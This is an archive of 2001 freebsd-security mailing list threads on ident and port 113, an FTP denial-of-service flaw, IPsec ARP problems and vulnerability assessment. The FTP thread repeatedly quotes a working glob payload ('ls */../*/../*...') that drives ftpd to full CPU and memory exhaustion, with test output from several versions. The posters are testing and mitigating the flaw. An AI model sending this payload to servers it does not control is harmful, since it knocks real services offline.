> > Could anybody tell me when I need to allow port 113
> > in the firewall?
> 
> *Need* for auth is a strong word.  However, it does tend to speed up
> email transfers if you enable a version that always responds true.
> 
> So, any external SMTP servers you have *should* have this port enabled.
> 
> > What services use this port?
> 
> I know that SMTP uses it, and I believe that ftpd uses it, and I believe
> irc also uses it.

smtp does not need to use it - you can achieve the same speedy transfers
by telling your smtp server not to bother. e.g. for sendmail:

  O Timeout.ident=0s

> > For example: I have a computer that is only a DNS server.
> > Does this port need to allow connections for the DNS service to work?
> 
> I don't believe so, but someone will certainly correct me if I'm wrong.

dns does not need ident.

cheers,
Adam
-- 
Adam Laurie                   Tel: +44 (20) 8742 0755
A.L. Digital Ltd.             Fax: +44 (20) 8742 5995
Voysey House                  http://www.thebunker.net
Barley Mow Passage            http://www.aldigital.co.uk
London W4 4GB                 mailto:adam@algroup.co.uk
UNITED KINGDOM                PGP key on keyservers

From owner-freebsd-security Thu Mar 15 12:36:44 2001
From: Nate Williams
Reply-To: nate@yogotech.com (Nate Williams)
To: Adam Laurie
Cc: Nate Williams, Ronan Lucio, security@FreeBSD.ORG
Subject: Re: Port 113
Date: Thu, 15 Mar 2001 13:36:16 -0700 (MST)
Message-ID: <15025.10176.676792.32675@nomad.yogotech.com>
In-Reply-To: <3AB1261F.23B8BE75@algroup.co.uk>
References: <006b01c0ad38$39eed0a0$1401a8c0@tedm.placo.com> <099801c0ad7c$75b63800$2aa8a8c0@melim.com.br> <15025.5630.472269.543769@nomad.yogotech.com> <3AB1261F.23B8BE75@algroup.co.uk>

> > > Could anybody tell me when I need to allow port 113
> > > in the firewall?
> > 
> > *Need* for auth is a strong word.  However, it does tend to speed up
> > email transfers if you enable a version that always responds true.
> > 
> > So, any external SMTP servers you have *should* have this port enabled.
> > 
> > > What services use this port?
> > 
> > I know that SMTP uses it, and I believe that ftpd uses it, and I believe
> > irc also uses it.
> 
> smtp does not need to use it - you can achieve the same speedy transfers
> by telling your smtp server not to bother. e.g. for sendmail:
> 
> O Timeout.ident=0s

My local sendmail doesn't use *my* ident server, but remote sendmail
servers use *my* ident server, so using ident locally speeds up mail
transfers *to* my host.

I certainly don't use ident for local email. :)

Nate

From owner-freebsd-security Thu Mar 15 12:39:35 2001
Message-ID: <552BB9A0AF05D411B71C0050DAC27561012ADB15@LOOKEX.look>
From: Jason Terlecki
To: Ronan Lucio, security@FreeBSD.ORG
Subject: RE: Port 113
Date: Thu, 15 Mar 2001 15:39:20 -0500

No, this port is used by identd.  Many IRC servers require you to be able
to respond on that port when you connect to it.  It allows daemons to
determine the username of a connecting client.

Jason Terlecki
System Analyst - Internet
Look Communication - Montreal

-----Original Message-----
From: Ronan Lucio [mailto:ronan@melim.com.br]
Sent: March 15, 2001 1:19 PM
To: security@FreeBSD.ORG
Subject: Port 113

Hi all,

Could anybody tell me when I need to allow port 113
in the firewall?

What services use this port?

For example: I have a computer that is only a DNS server.
Does this port need to allow connections for the DNS service to work?

Thanks
Ronan Lucio
From owner-freebsd-security Thu Mar 15 13:41:27 2001
Message-ID: <002301c0ad98$a2677fa0$1e9e6389@137.99.156.23>
From: "Peter C. Lai"
To: "Ronan Lucio"
References: <552BB9A0AF05D411B71C0050DAC27561012ADB15@LOOKEX.look>
Subject: Re: Port 113
Date: Thu, 15 Mar 2001 16:41:03 -0500

many IRC servers also require a valid rdns when doing the ident lookup.
I know when I am on a system which has no rdns, identd (port 113) is
necessary but not sufficient to let me connect to almost all EFNet
servers.

----- Original Message -----
From: "Jason Terlecki"
To: "Ronan Lucio"
Sent: Thursday, March 15, 2001 3:39 PM
Subject: RE: Port 113

No, this port is used by identd.  Many IRC servers require you to be able
to respond on that port when you connect to it.  It allows daemons to
determine the username of a connecting client.

Jason Terlecki
System Analyst - Internet
Look Communication - Montreal

-----Original Message-----
From: Ronan Lucio [mailto:ronan@melim.com.br]
Sent: March 15, 2001 1:19 PM
To: security@FreeBSD.ORG
Subject: Port 113

Hi all,

Could anybody tell me when I need to allow port 113
in the firewall?

What services use this port?

For example: I have a computer that is only a DNS server.
Does this port need to allow connections for the DNS service to work?

Thanks
Ronan Lucio

From owner-freebsd-security Thu Mar 15 14:09:26 2001
To: nate@yogotech.com (Nate Williams)
Cc: Adam Laurie, Ronan Lucio, security@FreeBSD.ORG
Subject: Re: Port 113
References: <006b01c0ad38$39eed0a0$1401a8c0@tedm.placo.com> <099801c0ad7c$75b63800$2aa8a8c0@melim.com.br> <15025.5630.472269.543769@nomad.yogotech.com> <3AB1261F.23B8BE75@algroup.co.uk> <15025.10176.676792.32675@nomad.yogotech.com>
From: Dag-Erling Smorgrav
Date: 15 Mar 2001 23:09:16 +0100
In-Reply-To: Nate Williams's message of "Thu, 15 Mar 2001 13:36:16 -0700 (MST)"

Nate Williams writes:
> My local sendmail doesn't use *my* ident server, but remote sendmail
> servers use *my* ident server, so using ident locally speeds up mail
> transfers *to* my host.

No, the problem only arises if you drop TCP 113 SYNs to the floor
instead of rejecting them (ipfw deny instead of ipfw reset); the
server times out waiting for you to reply. If you send an RST or an
ICMP UNREACH back, it'll give up immediately.

DES
-- 
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Thu Mar 15 14:12:36 2001
From: Nate Williams
Reply-To: nate@yogotech.com (Nate Williams)
To: Dag-Erling Smorgrav
Cc: nate@yogotech.com (Nate Williams), Adam Laurie, Ronan Lucio, security@FreeBSD.ORG
Subject: Re: Port 113
Date: Thu, 15 Mar 2001 15:11:48 -0700 (MST)
Message-ID: <15025.15908.270320.373266@nomad.yogotech.com>
References: <006b01c0ad38$39eed0a0$1401a8c0@tedm.placo.com> <099801c0ad7c$75b63800$2aa8a8c0@melim.com.br> <15025.5630.472269.543769@nomad.yogotech.com> <3AB1261F.23B8BE75@algroup.co.uk> <15025.10176.676792.32675@nomad.yogotech.com>

> > My local sendmail doesn't use *my* ident server, but remote sendmail
> > servers use *my* ident server, so using ident locally speeds up mail
> > transfers *to* my host.
> 
> No, the problem only arises if you drop TCP 113 SYNs to the floor
> instead of rejecting them (ipfw deny instead of ipfw reset); the
> server times out waiting for you to reply. If you send an RST or an
> ICMP UNREACH back, it'll give up immediately.

Hmm, I remember a long time ago where it was said (urban legend) that
even sending RST's confused older versions of mail servers.

Running the 'fake' ident server hasn't caused any problems AFAIK. :) :)

Nate

From owner-freebsd-security Thu Mar 15 14:16:33 2001
To: nate@yogotech.com (Nate Williams)
Cc: Adam Laurie, Ronan Lucio, security@FreeBSD.ORG
Subject: Re: Port 113
References: <006b01c0ad38$39eed0a0$1401a8c0@tedm.placo.com> <099801c0ad7c$75b63800$2aa8a8c0@melim.com.br> <15025.5630.472269.543769@nomad.yogotech.com> <3AB1261F.23B8BE75@algroup.co.uk> <15025.10176.676792.32675@nomad.yogotech.com> <15025.15908.270320.373266@nomad.yogotech.com>
From: Dag-Erling Smorgrav
Date: 15 Mar 2001 23:16:25 +0100
In-Reply-To: Nate Williams's message of "Thu, 15 Mar 2001 15:11:48 -0700 (MST)"

Nate Williams writes:
> Hmm, I remember a long time ago where it was said (urban legend) that
> even sending RST's confused older versions of mail servers.

Huh? Sending an RST results in connect() returning ECONNREFUSED, just
like it would if there were no firewall and no identd. Any mail server
that can't handle ECONNREFUSED is broken beyond belief.

DES
-- 
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Thu Mar 15 14:50:05 2001
From: Fernando Schapachnik
Reply-To: Fernando Schapachnik
Message-Id: <200103152250.TAA16613@ns1.via-net-works.net.ar>
Subject: Re: Multiple vendors FTP denial of service (fwd)
In-Reply-To: "from Attila Nagy at Mar 15, 2001 09:21:16 pm"
To: Attila Nagy
Cc: freebsd-security@FreeBSD.ORG
Date: Thu, 15 Mar 2001 19:50:23 -0300 (ART)

In an earlier message, Attila Nagy wrote:
> 
> FreeBSD isn't listed, but also vulnerable, at least with the FTPd in
> -STABLE.

Sure?

With 4.2-REL:

Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
150 Opening ASCII mode data connection for '/bin/ls'.
226 Transfer complete.
ftp>
ftp> ls
150 Opening ASCII mode data connection for '/bin/ls'.
total 13
-rw-r--r--  1 fpscha  wheel   628 27 dic 10:38 .cshrc
drwx------  2 fpscha  wheel   512 29 dic 13:17 .elm
-rw-------  1 fpscha  wheel  1517 20 feb 09:28 .history
-rw-r--r--  1 fpscha  wheel   299 27 dic 10:38 .login

[Everything normal, I mean]

Regards.

Fernando P. Schapachnik
Network administration
VIA NET.WORKS ARGENTINA S.A.
fschapachnik@vianetworks.com.ar
Switchboard: (54-11) 4323-3333 - Support: 0810-333-AYUDA

From owner-freebsd-security Thu Mar 15 14:58:40 2001
From: "Rodney W. Grimes"
Message-Id: <200103152258.OAA51686@gndrsh.dnsmgr.net>
Subject: Re: Port 113
In-Reply-To: <15025.15908.270320.373266@nomad.yogotech.com> from Nate Williams at "Mar 15, 2001 03:11:48 pm"
To: nate@yogotech.com (Nate Williams)
Date: Thu, 15 Mar 2001 14:58:00 -0800 (PST)
Cc: des@ofug.org (Dag-Erling Smorgrav), adam@algroup.co.uk (Adam Laurie), ronan@melim.com.br (Ronan Lucio), security@FreeBSD.ORG

> > > My local sendmail doesn't use *my* ident server, but remote sendmail
> > > servers use *my* ident server, so using ident locally speeds up mail
> > > transfers *to* my host.
> > 
> > No, the problem only arises if you drop TCP 113 SYNs to the floor
> > instead of rejecting them (ipfw deny instead of ipfw reset); the
> > server times out waiting for you to reply. If you send an RST or an
> > ICMP UNREACH back, it'll give up immediately.
> 
> Hmm, I remember a long time ago where it was said (urban legend) that
> even sending RST's confused older versions of mail servers.

There have been several problems over time with ipfw reset and icmp on
FreeBSD not doing the right things.  I've seen several commits that look
like they may be addressing the problem but have not found the time to
test to see if they fixed it.  I know from first hand experience that
using ipfw reset to try and stop ident requests used to do little to
nothing more than ipfw deny.

IIRC one of the problems I saw was that the icmp reset packet was
created with the address of the ipfw box, which caused it to be
ignored by the sending host.  Don't know if that ever got fixed or
not though.

> Running the 'fake' ident server hasn't caused any problems AFAIK. :) :)
> 
> Nate

-- 
Rod Grimes - KD7CAX @ CN85sl - (RWG25)               rgrimes@gndrsh.dnsmgr.net

From owner-freebsd-security Thu Mar 15 15:00:08 2001
Date: Thu, 15 Mar 2001 19:59:58 -0300
From: Frederico A C Neves
To: Fernando Schapachnik
Cc: Attila Nagy, freebsd-security@FreeBSD.ORG
Subject: Re: Multiple vendors FTP denial of service (fwd)
Message-ID: <20010315195957.S78129@registro.br>
References: <200103152250.TAA16613@ns1.via-net-works.net.ar>
In-Reply-To: <200103152250.TAA16613@ns1.via-net-works.net.ar>; from fpscha@ns1.via-net-works.net.ar on Thu, Mar 15, 2001 at 07:50:23PM -0300

I think so. With 4.2-STABLE in an anonymous session we got 100% CPU
until we killed ftpd.

On Thu, Mar 15, 2001 at 07:50:23PM -0300, Fernando Schapachnik wrote:
> In an earlier message, Attila Nagy wrote:
> > 
> > FreeBSD isn't listed, but also vulnerable, at least with the FTPd in
> > -STABLE.
> 
> Sure?
> 
> With 4.2-REL:
> 
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
> 150 Opening ASCII mode data connection for '/bin/ls'.
> 226 Transfer complete.
> ftp>
> ftp> ls
> 150 Opening ASCII mode data connection for '/bin/ls'.
> total 13
> -rw-r--r--  1 fpscha  wheel   628 27 dic 10:38 .cshrc
> drwx------  2 fpscha  wheel   512 29 dic 13:17 .elm
> -rw-------  1 fpscha  wheel  1517 20 feb 09:28 .history
> -rw-r--r--  1 fpscha  wheel   299 27 dic 10:38 .login
> 
> [Everything normal, I mean]
> 
> 
> Regards.
> 
> Fernando P. Schapachnik
> Network administration
> VIA NET.WORKS ARGENTINA S.A.
> fschapachnik@vianetworks.com.ar
> Switchboard: (54-11) 4323-3333 - Support: 0810-333-AYUDA

-- 
Frederico A C Neves      Registro .br - R.Pio XI, 1500
+55 11 3838-4130         São Paulo, SP, Brazil - 05468-901

From owner-freebsd-security Thu Mar 15 15:14:59 2001
Message-Id: <4.2.2.20010315181354.02a035d0@marble.sentex.net>
Date: Thu, 15 Mar 2001 18:14:53 -0500
To: freebsd-security@FreeBSD.ORG
From: Mike Tancsa
Subject: Re: Multiple vendors FTP denial of service (fwd)
In-Reply-To: <200103152250.TAA16613@ns1.via-net-works.net.ar>

4.1 from Aug 10th is hurt by it.

        ---Mike

At 07:50 PM 3/15/2001 -0300, Fernando Schapachnik wrote:
>In an earlier message, Attila Nagy wrote:
> >
> > FreeBSD isn't listed, but also vulnerable, at least with the FTPd in
> > -STABLE.
>
>Sure?
>
>With 4.2-REL:
>
>Remote system type is UNIX.
>Using binary mode to transfer files.
>ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
>150 Opening ASCII mode data connection for '/bin/ls'.
>226 Transfer complete.
>ftp>
>ftp> ls
>150 Opening ASCII mode data connection for '/bin/ls'.
>total 13
>-rw-r--r--  1 fpscha  wheel   628 27 dic 10:38 .cshrc
>drwx------  2 fpscha  wheel   512 29 dic 13:17 .elm
>-rw-------  1 fpscha  wheel  1517 20 feb 09:28 .history
>-rw-r--r--  1 fpscha  wheel   299 27 dic 10:38 .login
>
>[Everything normal, I mean]
>
>
>Regards.
>
>Fernando P. Schapachnik
>Network administration
>VIA NET.WORKS ARGENTINA S.A.
>fschapachnik@vianetworks.com.ar
>Switchboard: (54-11) 4323-3333 - Support: 0810-333-AYUDA

--------------------------------------------------------------------
Mike Tancsa,                                   tel +1 519 651 3400
Network Administration,                        mike@sentex.net
Sentex Communications                          www.sentex.net
Cambridge, Ontario Canada                      www.sentex.net/mike

From owner-freebsd-security Thu Mar 15 15:15:30 2001
To: "Rodney W. Grimes"
Cc: nate@yogotech.com (Nate Williams), adam@algroup.co.uk (Adam Laurie), ronan@melim.com.br (Ronan Lucio), security@FreeBSD.ORG
Subject: Re: Port 113
References: <200103152258.OAA51686@gndrsh.dnsmgr.net>
From: Dag-Erling Smorgrav
Date: 16 Mar 2001 00:15:13 +0100
In-Reply-To: "Rodney W. Grimes"'s message of "Thu, 15 Mar 2001 14:58:00 -0800 (PST)"

"Rodney W. Grimes" writes:
> IIRC one of the problems I saw was that the icmp reset packet was
> created with the address of the ipfw box, which caused it to be
> ignored by the sending host.  Don't know if that ever got fixed or
> not though.

Uh, you're probably right. I mostly run ipfw on the leaf host, so I
wouldn't get hit by that bug.

DES
-- 
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Thu Mar 15 15:17:06 2001
From: "Antonio Carlos Pina"
Reply-To: apina@infolink.com.br
To: freebsd-security@freebsd.org
Date: Thu, 15 Mar 2001 20:17:00 est
Subject: Re: Multiple vendors FTP denial of service (fwd)
Message-id: <3ab14d6c.31f.0@infolink.com.br>

Hello,

Actually I think this highly depends on HOW MANY files and
directories FTPD can access.

I didn't see any damage with a jailed FTPD with 1 directory and 2
files.

Best Regards,

>I think so. With 4.2-STABLE in an anonymous session we got 100% CPU
>until we killed ftpd.
>
>> > FreeBSD isn't listed, but also vulnerable, at least with the FTPd in
>> > -STABLE.
>>
>> Sure?
>>
>> With 4.2-REL:
>>
>> Remote system type is UNIX.
>> Using binary mode to transfer files.
>> ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
>> 150 Opening ASCII mode data connection for '/bin/ls'.
>> 226 Transfer complete.
>> ftp>
>> ftp> ls
>> 150 Opening ASCII mode data connection for '/bin/ls'.
>> total 13
>> -rw-r--r--  1 fpscha  wheel   628 27 dic 10:38 .cshrc
>> drwx------  2 fpscha  wheel   512 29 dic 13:17 .elm
>> -rw-------  1 fpscha  wheel  1517 20 feb 09:28 .history
>> -rw-r--r--  1 fpscha  wheel   299 27 dic 10:38 .login
>>
>> [Everything normal, I mean]
>>
>>
>> Regards.
>>
>> Fernando P. Schapachnik
>> Network administration
>> VIA NET.WORKS ARGENTINA S.A.
>> fschapachnik@vianetworks.com.ar
>> Switchboard: (54-11) 4323-3333 - Support: 0810-333-AYUDA
>>
>
>-- 
> Frederico A C Neves      Registro .br - R.Pio XI, 1500
> +55 11 3838-4130         São Paulo, SP, Brazil - 05468-901
>

Regards,

Antonio Carlos Pina                     apina@infolink.com.br
Director of Technology (CTO)            http://www.infolink.com.br

From owner-freebsd-security Thu Mar 15 15:44:26 2001
Message-ID: <004b01c0ada9$99f7b540$db9497cf@singingtree.com>
From: "Michael A. Dickerson"
Subject: Re: Multiple vendors FTP denial of service (fwd)
Date: Thu, 15 Mar 2001 15:42:29 -0800
References: <98righ$100l$1@FreeBSD.csie.NCTU.edu.tw>

> 4.1 from Aug 10th is hurt by it.
>
> ---Mike
>

So is 4.3-beta (otherwise known as 4-stable) from March 8. ftpd uses 100% cpu and memory use grows until the kernel runs out of swap space and starts killing processes. This was an ftp connection with a regular username and password, in an average home directory.

M.D.

From owner-freebsd-security Thu Mar 15 15:52:39 2001
Date: Thu, 15 Mar 2001 15:52:34 -0800
From: Alfred Perlstein
To: Antonio Carlos Pina
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Multiple vendors FTP denial of service (fwd)
Message-ID: <20010315155234.G29888@fw.wintelcom.net>
In-Reply-To: <3ab14d6c.31f.0@infolink.com.br>

* Antonio Carlos Pina [010315 15:17] wrote:
> Hello,
>
> Actually I think this highly depends on HOW MANY files and
> directories FTPD can access.
>
> I didn't see any damage with a jailed FTPD with 1 directory and 2
> files.

The only reason you didn't see a problem was because you had only one directory.

The DoS works via a simple mechanism.

If you have a dir with two directories in it, 'a' and 'b':

  */../      ->  a/..  b/..
  */../*/..  ->  a/../a/..  a/../b/..  b/../a/..  b/../b/..

Basically for each ../*/ you do a power N where N is the number of directories.

How could this be fixed? I think it's somewhat simple: have glob() maintain a truncated version of paths and make sure that any collisions are detected. Of course this is only speculation since I haven't looked at the code.
--
-Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org]

From owner-freebsd-security Thu Mar 15 19:38:28 2001
Message-ID: <3AB18AAC.9069CBF2@ahpcns.com>
Date: Thu, 15 Mar 2001 21:38:20 -0600
From: jomor
Organization: ahpcns
To: Mike Burgett
Cc: "freebsd-security@FreeBSD.ORG"
Subject: Re: IPSEC tunnel without gif?
References: <200103150440.f2F4eZB25117@dragon.awen.com>

Mike Burgett wrote:
> On Wed, 14 Mar 2001 22:21:30 -0600, jomor wrote:
>
> >The gateway that received the pings was transmitting ARP
> >requests but strangely, it was trying to get the hardware
> >address of the other tunnel endpoint rather than that of
> >the router in the middle. Since the ARP requests were never
> >answered, the ping response was never transmitted.
>
> This sounds an awful lot like:
>
> http://www.FreeBSD.org/cgi/query-pr.cgi?pr=21079
>
> I added a static arp entry for my router awhile back to work around this
> very thing.
>
> Thanks,
> Mike

Yup, that's it. I got the same thing testing with a straight (no ipsec) gif tunnel too.

Are you running this in a "production" environment or just playing with it? Has it proven reliable with the static arp entry?

I was pleasantly surprised to find that I didn't have any PMTUD problems today (with ipsec up) like I did with PPTP.
Thanks
...jgm

From owner-freebsd-security Thu Mar 15 21:29:55 2001
To: jomor
Cc: Mike Burgett, "freebsd-security@FreeBSD.ORG"
In-reply-to: jomor's message of Thu, 15 Mar 2001 21:38:20 CST. <3AB18AAC.9069CBF2@ahpcns.com>
Subject: Re: IPSEC tunnel without gif?
From: itojun@iijlab.net
Date: Fri, 16 Mar 2001 14:29:36 +0900
Message-ID: <19427.984720576@coconut.itojun.org>

>> >The gateway that received the pings was transmitting ARP
>> >requests but strangely, it was trying to get the hardware
>> >address of the other tunnel endpoint rather than that of
>> >the router in the middle. Since the ARP requests were never
>> >answered, the ping response was never transmitted.

	so you are seeing ARP for tunnel inner addresses?
	http://www.kame.net/dev/cvsweb.cgi/kame/kame/sys/netinet6/ipsec.c.diff?r1=1.84&r2=1.85
	should fix the above issue.  not sure about freebsd merge status.

itojun

From owner-freebsd-security Thu Mar 15 21:59:16 2001
Date: Thu, 15 Mar 2001 21:59:13 -0800
From: Kris Kennaway
To: "Michael A. Dickerson"
Cc: freebsd-security@freebsd.org
Subject: Re: Multiple vendors FTP denial of service (fwd)
Message-ID: <20010315215913.A70990@mollari.cthul.hu>
References: <98righ$100l$1@FreeBSD.csie.NCTU.edu.tw> <004b01c0ada9$99f7b540$db9497cf@singingtree.com>
In-Reply-To: <004b01c0ada9$99f7b540$db9497cf@singingtree.com>

On Thu, Mar 15, 2001 at 03:42:29PM -0800, Michael A. Dickerson wrote:
> > 4.1 from Aug 10th is hurt by it.
> >
> > ---Mike
> >
>
> So is 4.3-beta (otherwise known as 4-stable) from March 8. ftpd uses 100%
> cpu and memory use grows until the kernel runs out of swap space and starts
> killing processes. This was an ftp connection with a regular username and
> password, in an average home directory.

I'm pretty sure (but haven't tested) that resource limits will prevent this problem. Your ftpd shouldn't be using a large amount of memory under normal operating procedures, so you can set those to reasonable values and not suffer any ill effects.
Kris

From owner-freebsd-security Thu Mar 15 22:37:42 2001
Date: Thu, 15 Mar 2001 22:37:36 -0800
From: "Crist J. Clark"
To: Kris Kennaway
Cc: "Michael A. Dickerson", freebsd-security@FreeBSD.ORG
Subject: Re: Multiple vendors FTP denial of service (fwd)
Message-ID: <20010315223736.C28471@rfx-216-196-73-168.users.reflex>
Reply-To: cjclark@alum.mit.edu
In-Reply-To: <20010315215913.A70990@mollari.cthul.hu>

On Thu, Mar 15, 2001 at 09:59:13PM -0800, Kris Kennaway wrote:
> On Thu, Mar 15, 2001 at 03:42:29PM -0800, Michael A. Dickerson wrote:
> > > 4.1 from Aug 10th is hurt by it.
> > >
> > > ---Mike
> > >
> >
> > So is 4.3-beta (otherwise known as 4-stable) from March 8. ftpd uses 100%
> > cpu and memory use grows until the kernel runs out of swap space and starts
> > killing processes. This was an ftp connection with a regular username and
> > password, in an average home directory.
>
> I'm pretty sure (but haven't tested) that resource limits will prevent
> this problem. Your ftpd shouldn't be using a large amount of memory
> under normal operating procedures, so you can set those to reasonable
> values and not suffer any ill effects.

And this really does not have a lot directly to do with ftpd. Try,

  $ ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/

at a command line and watch what the shell does. It's a general globbing issue.

Anyway, as for ftpd, all a user can do is kill the ftpd process they are using, provided, as Kris points out, resource limits are set appropriately. The user can do pretty much the same thing by logging out.
--
Crist J. Clark
cjclark@alum.mit.edu

From owner-freebsd-security Thu Mar 15 23:03:21 2001
Date: Fri, 16 Mar 2001 16:03:11 +0900
From: "ho-sang, yoon"
To: freebsd-security@freebsd.org
Cc: Kris Kennaway
Subject: Re: Multiple vendors FTP denial of service (fwd)
Message-ID: <20010315215913.A70990@mollari.cthul.hu>
Reply-To: tsoi@xocah.holywar.net

Mmmm..

-----------------------------------------------------------------------------
$ uname -a
FreeBSD 4.2-STABLE
$ whoami
ftp
$ ulimit -a
cpu time               (seconds, -t)  unlimited
file size           (512-blocks, -f)  unlimited
data seg size           (kbytes, -d)  524288
stack size              (kbytes, -s)  65536
core file size      (512-blocks, -c)  102400
max memory size         (kbytes, -m)  20480
locked memory           (kbytes, -l)  10240
max user processes              (-u)  8211
open files                      (-n)  16424
sbsize                   (bytes, -b)  unlimited
-----------------------------------------------------------------------------
---top-----------------------------------------------------------------------
  PID USERNAME PRI NICE  SIZE    RES STATE    TIME   WCPU    CPU COMMAND
 6379 root      55   0 33360K 33016K RUN      0:40 86.02% 84.67% ftpd
[cut]
-----------------------------------------------------------------------------

and, have killed the pid in another terminal.

I don't think that the resource limit has any effect on this matter. Or am I wrong about something?
--
no signature

From owner-freebsd-security Fri Mar 16 01:25:58 2001
Message-ID: <3AB1DBF9.C721E3D6@vianetworks.co.uk>
Date: Fri, 16 Mar 2001 09:25:13 +0000
From: Peter McGarvey
Organization: VIA NETdotWORKS
To: freebsd-security
Subject: What's vulnerable?

I've just inherited several FreeBSD boxes. The versions range from 3.2_RELEASE to 4.1_RELEASE.

On the BSD boxes I already maintain I cvsup and make world on a monthly basis - or as soon as I see a CERT advisory that I know relates to something that can bite. But the inherited boxes need a lot of work, and I cannot guarantee to "The Powers That Be" that a make world won't break the box.

What I really need to know is what vulnerabilities exist on each box - so that I can present the boss with a risk assessment, and make him decide if the box stays as is, or gets a make world.

So any advice anyone can give me, on how to find out what's vulnerable with any particular FreeBSD version, would be greatly appreciated.

--
TTFN, FNORD
Peter McGarvey
System Administrator
Network Operations, VIA Networks UK

From owner-freebsd-security Fri Mar 16 01:34:48 2001
Date: Fri, 16 Mar 2001 10:34:41 +0100 (MET)
From: Per Christian Henden
Subject: weird error messages (at least I don't understand them)

My daily "security check output" (autogenerated mail sent to root, enabled by default in freebsd) contains a varying number of lines just like this:

arp: unknown hardware address format (0x0800)

Is this something I should be worried about?

These entries (or something similar) also appear fairly frequently (I replaced my real dns-name with "my.hostname.domain"):

Checking for rejected mail hosts:
     5 malvix.hist.no
     2 my.hostname.domain
     2 malvix.hist.no@my.hostname.domain
     1 ;

Date: Fri, 16 Mar 2001 01:40:04 -0800
From: Kris Kennaway
To: Peter McGarvey
Cc: freebsd-security
Subject: Re: What's vulnerable?
Message-ID: <20010316014004.A86953@mollari.cthul.hu>
In-Reply-To: <3AB1DBF9.C721E3D6@vianetworks.co.uk>

On Fri, Mar 16, 2001 at 09:25:13AM +0000, Peter McGarvey wrote:
> I've just inherited several FreeBSD boxes. The versions range from
> 3.2_RELEASE to 4.1_RELEASE.
>
> On the BSD boxes I already maintain I cvsup and make world on a monthly
> basis - or as soon as I see a CERT advisory that I know relates to
> something that can bite. But the inherited boxes need a lot of work,
> and I cannot guarantee to "The Powers That Be" that a make world won't
> break the box.
>
> What I really need to know is what vulnerabilities exist on each box -
> so that I can present the boss with a risk assessment, and make him
> decide if the box stays as is, or gets a make world.
>
> So any advice anyone can give me, on how to find out what's vulnerable
> with any particular FreeBSD version, would be greatly appreciated.

Read the advisories.
Kris

From owner-freebsd-security Fri Mar 16 01:40:29 2001
Date: Fri, 16 Mar 2001 10:39:54 +0000
From: Lukasz Pawlik
To: freebsd-security@freebsd.org
Subject: Invalid hostname
Message-ID: <20010316103954.A24855@btk.za.net>

Hello,

I'd like to ask for a little help. I don't understand one record which is printed by last.

ash   ttyp2   invalid hostname   Ndz 11 Mar 19:07 - 20:13  (01:06)

What is the 'invalid hostname'? If DNS failed, why is there no IP? Can someone explain it to me?

Lukasz

--
Lukasz Pawlik
e-mail: Lukasz.Pawlik@kielce.wox.org

From owner-freebsd-security Fri Mar 16 02:07:09 2001
Date: Fri, 16 Mar 2001 10:10:11 +0000
From: Marc Rogers
To: freebsd-security@FreeBSD.ORG
Subject: Re: What's vulnerable?
Message-ID: <20010316101011.U10016@shady.org>
In-Reply-To: <3AB1DBF9.C721E3D6@vianetworks.co.uk>

Hi

Point your browser at:

http://www.freebsd.org/security/#adv

All the info you need is there.

My advice to you though is to consider synchronising your boxes. It is far, far easier to secure several of the same thing than it is to secure lots of different things.

Marc Rogers
Head of Network Operations & Security
EDC Group

From owner-freebsd-security Fri Mar 16 02:19:58 2001
Date: Fri, 16 Mar 2001 10:23:02 +0000
From: Marc Rogers
To: freebsd-security@FreeBSD.ORG
Subject: Re: What's vulnerable?
Message-ID: <20010316102302.V10016@shady.org>
In-Reply-To: <3AB1DBF9.C721E3D6@vianetworks.co.uk>

On the subject of updating a large number of freebsd boxes...

I just thought I would throw my twopence worth in, as while working for a number of entirely freebsd based isps a few years ago, I had to deal with exactly this problem.

Making world in situ on production servers is a game of russian roulette. Most of the time it works, but the older the starting version, the harder it becomes.

The safest way to synchronise a large number of boxes (in my view) is to play a shell game with them. Take one clean box and install freebsd and whatever base software you need. Then migrate the customer data from one of your older boxes onto this new one. When you are comfortable that the new box can replace the old one completely, shut down the old one and bring up the interfaces on the replacement.

Next take the box you just replaced, and after backing everything up, reinstall the os. Use this box to upgrade another, and so on.

When you get the hang of it, it becomes quite a swift process. Please ensure that you do back everything up though, as I can guarantee you will forget something.

If you need any further help, feel free to mail me.
Marc Rogers
Head of Network Operations & Security
EDC Group

From owner-freebsd-security Fri Mar 16 02:26:17 2001
To: kris@obsecurity.org
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: What's vulnerable?
In-Reply-To: Your message of "Fri, 16 Mar 2001 01:40:04 -0800" <20010316014004.A86953@mollari.cthul.hu>
Message-Id: <20010316192556Q.sakane@ydc.co.jp>
Date: Fri, 16 Mar 2001 19:25:56 +0900
From: Shoichi Sakane

> > What I really need to know is what vulnerabilities exist on each box -
> > so that I can present the boss with a risk assessment, and make him
> > decide if the box stays as is, or gets a make world.

> Read the advisories.

Why doesn't the maintainer of the openssh port upgrade its version? The current version of the port is openssh 2.2.0, which has some vulnerability.

From owner-freebsd-security Fri Mar 16 03:10:25 2001
Date: Fri, 16 Mar 2001 12:11:58 +0100
From: Ashley Penney
To: freebsd-security@freebsd.org
Subject: Re: What's vulnerable?
Message-ID: <20010316121158.A17693@daphne.unloved.org>
In-Reply-To: <3AB1DBF9.C721E3D6@vianetworks.co.uk>

On Fri, Mar 16, 2001 at 09:25:13AM +0000, Peter McGarvey said:
> I've just inherited several FreeBSD boxes. The versions range from
> 3.2_RELEASE to 4.1_RELEASE.
>
> On the BSD boxes I already maintain I cvsup and make world on a monthly
> basis - or as soon as I see a CERT advisory that I know relates to
> something that can bite. But the inherited boxes need a lot of work,
> and I cannot guarantee to "The Powers That Be" that a make world won't
> break the box.
>
> What I really need to know is what vulnerabilities exist on each box -
> so that I can present the boss with a risk assessment, and make him
> decide if the box stays as is, or gets a make world.
>
> So any advice anyone can give me, on how to find out what's vulnerable
> with any particular FreeBSD version, would be greatly appreciated.

